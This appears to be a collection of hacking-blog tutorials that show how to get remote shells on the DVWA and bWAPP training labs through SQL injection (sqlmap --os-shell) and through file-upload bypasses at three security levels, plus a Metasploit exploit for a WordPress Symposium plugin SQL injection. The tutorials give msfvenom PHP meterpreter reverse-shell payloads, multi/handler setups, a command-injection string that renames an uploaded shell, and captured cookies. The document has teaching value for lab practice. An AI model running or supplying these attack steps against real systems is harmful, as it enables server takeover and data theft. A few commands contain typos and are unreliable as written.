Meterpreter Shell uploading in DVWA using SQl Injection

This article is exactly same as previous article; today I will make use of sqlmap to upload backdoor filein DVWA suffering from sql injection vulnerbility.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  

Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Burp suit will provide” cookie” and “referrer” under fetched data which will later use in sqlmap commands.

In following Sqlmap will analysis the url for making connection from target and then use sql queries for given cookies to fetch all names of database.

sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0″  –dbs

So if you notice image given below it has dumb all name of database. Choose dvwa to upload php backdoor.

Now Type following command to run sqlmap to access os-shell of web server (dvwa)

sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0″  -D dvwa –os-shell

It will try to generate a backdoor; I want to create PHP backdoor in target pc therefore type 4 for PHP payload and then Type 4 for brute force search to use as writable directory to upload it.

It is trying to upload the file on “/xampp/htdocs/” by using different sql injection techniques. As soon as file is uploaded; it will send INFO the file stager has been successfully uploaded on “/xampp/htdocs/”and you will get os-shell of victim pc. Other than here it also shows the path where

you can manually upload your backdoor, look at over highlighted URL:

http://192.168.0.102/tmpunias.php

Explore the URL:http://192.168.0.102/tmpunais.php on browser. From screenshot you can read the heading of web page sqlmap file uploader which will let you to browse you backdoor on web server(dvwa) and will later upload that backdoor to following directory (“/xampp/htdocs/” )of web server.

Let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw. 

copy the code from <?php to die() and save it in a file with .php extension. I have saved the backdoor as shell.php on desktop and will later browser this file to upload on web server.

Now load metasploit framework by typing msfconsole and start multi/handler

Click on browse to select your shell.php file and then click on upload.

GREAT!!!  Here it shows Admin File is uploaded which means backdoor shell.php is uploaded.

To execute backdoor on target pc run URL:192.168.0.102/shell.php on browser and you will receive reverse connection to multi/handler.

msf> use multi/handler

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > exploit

meterpreter>sysinfo

Divine!!!  meterpreter session is opened .

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Shell uploading through sql Injection using Sqmap in bWAPP

Multiple times you people have used sqlmap for sql injection to get database of web server. Here in this tutorial I will show you how to upload any backdoor if the website is suffering from sql vulnerability.

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, sqlmap tool

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here

Let’s begin!!!

 Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any movie name like thor in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click on search. Burp suit will provide cookie and referer under fetched data which will later use in sqlmap commands.

Now Type following command to run sqlmap to access os-shell of web server.

sqlmap -u “http://192.168.0.102:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=” PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0″ -D bwapp –os-shell

Above command will try to generate a backdoor; I want to send PHP backdoor in target pc therefore type 4 for PHP payload and then Type 1 for common location to use as writable directory to upload it.

At present it is trying to upload the file on “C: /xampp/htdocs/” by using different sql injection techniques. As soon as file is uploaded; it will send INFO the file stager has been successfully uploaded on “C: /xampp/htdocs/”and you will get os-shell of victim pc. But here it also showing the path where you can manually upload your backdoor, look at over highlighted URL:

http://192.168.0.102/tmpuuddt.php

I am more interested in meterpreter shell so let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw. Copy the code from <?php to die() and save it in a file with .php extension. I have saved the backdoor as shell.php on desktop and will later browser this file to upload on web server.

Now load metasploit framework by typing msfconsole and start multi/handler

Explore the URL: http://192.168.0.102/tmpuuddt.php on browser. From screenshot you can read the heading of web page sqlmap file uploader which will let you to browse you backdoor on web server and will later upload that backdoor to following directory (“C: /xampp/htdocs/” )of web server.

Click on browse to select your shell.php file and then click on upload.

GREAT!!!  Our backdoor shell.php File uploaded.

To execute backdoor on target pc run URL:192.168.0.102/shell.php on browser and you will receive reverse connection to multi/handler.

 msf> use multi/handler

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > exploit

meterpreter>sysinfo

Lovely!!! I have my meterpreter session on my kali Linux.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

WordPress Penetration Testing using Symposium Plugin SQL Injection

WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy.”

WordPress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter ‘size’. The issue is exploitable even if the plugin is deactivated.

The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users’ password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the WordPress installation. Collected information may also allow further attacks. 

https://www.exploit-db.com/exploits/37824

 Attacker: kali Linux

Target: wordpress

Let start!!!!

Start WPSCAN in kali from following step:

Now scan the target IP for scanning any wordpress application and type following command

Through this command we are scanning current plugin installed for any wordpress website.

./wpscan.rb –url http://192.1681.0.104 –enumerate p

The red sign indicating wp symposium 15.5.1 is vulnerable and suffers from an unauthenticated SQL Injection although blue sign shows version 15.8 if fixed which is not vulnerable till now.

 Now start metasploit for attack and type msfconsole on terminal in kali Linux.

msf > use auxiliary/admin/http/wp_symposium_sql_injection

 msf auxiliary(wp_symposium_sql_injection) >set rhost 192.1681.0.104

msf auxiliary(wp_symposium_sql_injection) >set rport 80

msf auxiliary(wp_symposium_sql_injection) >exploit

Nice!!! Here we found the relevant username and password as user: raj respectively.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack File upload Vulnerability in DVWA (Bypass All Security)

File upload vulnerability are a major problem with web based applications. In many web server this vulnerability depend entirely on purpose that allows an attacker to upload a file hiding malicious code inside that can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and some chances to sensitive data might be informal, by unauthorized people.

In DVWA the webpage allows user to upload an image, and the webpage go through with program coding and checks if the last characters of the file is ‘.jpg’ or ‘.jpeg’ or ’.png’ before allowing the image get uploaded in directory.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, metasploit framework

DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Copy and paste the highlighted code in leafnod and save as with PHP extension as hack.php on the desktop.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Now click to browse button to browse hack.php file to upload it on web server and click on upload which will upload your file in directory of server.

After uploading a PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and past it in URL to execute it.

hackable/uploads/hack.php

Before executing this URL on browser start and run multi handler in metasploit framework using below command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide you a meterpreter session 1.

192.168.1.102:81/DVWA/hackable/uploads/hack.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 3333

msf exploit(handler) > run

meterpreter > sysinfo

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level medium

Same process to create php backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as raj.php.jpeg on desktop. Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Again click to browse button to browse raj.php.jpeg file to upload it. Now start burp suit and make intercept on under proxy tab.  Don’t forget to set manual proxy of your browser and click on  upload.

 Intercept tab will work to catch post method when you click to upload button.  Now convert raj.php.jpeg into raj.php

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory.

This will show the path of uploaded file of the directory where file is successfully uploaded.

hackable/uploads/raj.php

Now repeat the whole process same as in low security to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/raj.php

This’ll provide a meterpreter session 2 when you run URL in browser.

 meterpreter > sysinfo

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as shell.jpeg on desktop. Since this file will get upload in high security which is little different from low and medium security as this will apparently check the extension of file as well as piece of code also therefore type GIF98 before PHP code and save as shell.jpeg.

Repeat the process to browse shell.jpeg

Again you will get directory path of uploaded file.

This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability. Here this vulnerability let you copy and rename this shell.jpeg into PHP file. Types following in text box which will copied and rename shell.jpeg into aa.php

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you will submit the command the PHP file get copied with new name as aa.php

Now repeat the process to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/aa.php

Wonderful!! Here we get meterpreter session 3 also.

meterpreter > sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...